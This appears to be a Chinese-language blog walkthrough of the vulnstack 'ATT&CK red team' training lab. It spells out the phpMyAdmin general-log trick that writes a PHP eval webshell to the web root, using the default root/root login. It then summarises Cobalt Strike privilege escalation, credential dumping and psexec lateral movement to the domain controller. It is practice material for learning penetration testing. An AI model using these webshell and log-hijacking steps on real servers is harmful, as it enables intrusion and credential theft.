banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

ATT&CK紅隊評估實戰靶場-1

簡介#

靶場來自:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

簡單的一個靶場,本來用作學生的考核的,但是沒用到,橫向的域滲透也只是用了 cobalt strike 上的 psexec 模塊,主要的內容是熟悉一些滲透的流程。

靶場有很多漏洞都沒法復現成功,環境會有一些問題,但整體的流程沒問題。

環境搭建#

需要關閉加速 3D 圖形,不然無法啟動虛擬機

image

拓撲圖如下:

image

網絡設置如下,用到 VMnet2 和 VMnet8:

image

web 伺服器(VM1) - win7(雙網卡,NAT 模式 + vmnet2(host-only))

image

ip:192.168.111.128 和 192.168.52.143

開啟 phpstudy

image

DNS 指向 DC

image

win2008 DC(VM3)

ip:192.168.52.138

image

win03 域成員(vm2)

ip:192.168.52.141

image

查看當前的域

image

滲透過程#

信息收集#

nmap 端口掃描#

image

image

御劍掃描#

image

目錄掃描#

image

phpinfo 頁面

image

phpmyadmin 登錄#

若密碼:root/root

image

phpmyadmin getshell#

通過日誌 getshell

查看日誌是否開啟記錄及日誌存儲位置:SHOW VARIABLES LIKE "general_log%";
image

開啟日誌:set global general_log='on';
查詢是否開啟:SHOW VARIABLES LIKE "general_log%"

image

設置寫入的日誌文件為惡意文件,需要先找到網站目錄

image

設置日誌路徑:set global general_log_file ='C:\\phpStudy\\WWW\\s.php';

設置成功

image

準備工作好後,開始寫馬。只需要通過 sql 語句查詢即可

select "<?php @eval($_POST[cmd]);?>";

image

訪問 webshell:
http://192.168.111.128/ss.php

image

蟻劍連接:

image

網站的 80 端口是 yxcms

image

登錄後台,一樣可以執行 sql 語句

image

webshell 查看 ip 地址

image

發現雙網卡

cs 啟動#

上線到 cobalt strike 上操作

服務端

image

客戶端

建立監聽

image

image

生成 payload

image

payload 上傳至蟻劍執行

image

運行 exe,cs 上線

image

sleep 0

image

shell whoami

image

提權#

cs 上用 getsystem 一鍵提權,獲取 system 權限

image

內網信息收集#

image

點擊 target 發現三台機器,如果點開沒有,端口掃描一下就有了

image

dumphash

image

獲取明文密碼

image

橫向移動#

獲取到密碼後,通過 psexec 橫向移動,這裡主要是三台機器的密碼都是一樣的,如果不一樣,就無法通過 smb 橫向移動了。

image

選擇 psexec64,64 位

image

image

獲取域控伺服器

image

image

image

同樣的方式控制 141,win2003 那台域成員機器

image

需要選擇 psexec,32 位

image

查看下 ip

image

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。